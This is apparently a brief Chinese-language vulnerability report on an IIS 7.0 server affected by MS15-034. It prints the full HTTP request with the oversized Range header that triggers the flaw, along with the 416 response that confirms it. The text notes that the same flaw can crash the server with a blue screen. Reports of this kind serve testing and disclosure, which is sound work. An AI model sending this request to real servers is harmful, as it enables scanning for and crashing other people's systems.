远程代码执行漏洞

漏洞地址：http://.../favicon.ico

HTTP request：


GET /favicon.ico HTTP/1.1

Range: bytes=0-18446744073709551615

Connection: keep-alive

Cookie: %BA%D7%B1%DA%CA%D0%D7%DC%B9%A4%BB%E1=ViewUrl=%2FE%5FReadNews%2Easp%3FNewsID%3D2062;ASPSESSIONIDQCDTSTBB=EAIDCICCNMKMENPBHPNNILNL

Accept: */*

Accept-Encoding: gzip,deflate

Host: ***.***.***.**

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Content-Length: 2

HTTP response：


HTTP/1.1 416 Requested Range Not Satisfiable

Content-Type: image/x-icon

Last-Modified: Mon, 01 Jun 2015 12:16:07 GMT

Accept-Ranges: bytes

ETag: "201a44bd649cd01:0"

Server: Microsoft-IIS/7.0

X-Powered-By: ASP.NET

Date: Wed, 20 Feb 2019 07:14:25 GMT

Content-Length: 362

Content-Range: bytes */1150



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">

<HTML><HEAD><TITLE>Requested Range Not Satisfiable</TITLE>

<meta HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>

<BODY><h2>Requested Range Not Satisfiable</h2>

<hr><p>HTTP Error 416. The requested range is not satisfiable.</p>

</BODY></HTML>

Range: bytes=0-18446744073709551615

使用IIS作为WEB容器且使用版本存在编号为MS-15034的远程代码执行漏洞。利用该漏洞可轻易使服务器宕机蓝屏。发送测试代码，若返回“Requested Range Not Satisfiable”证明存在此漏洞。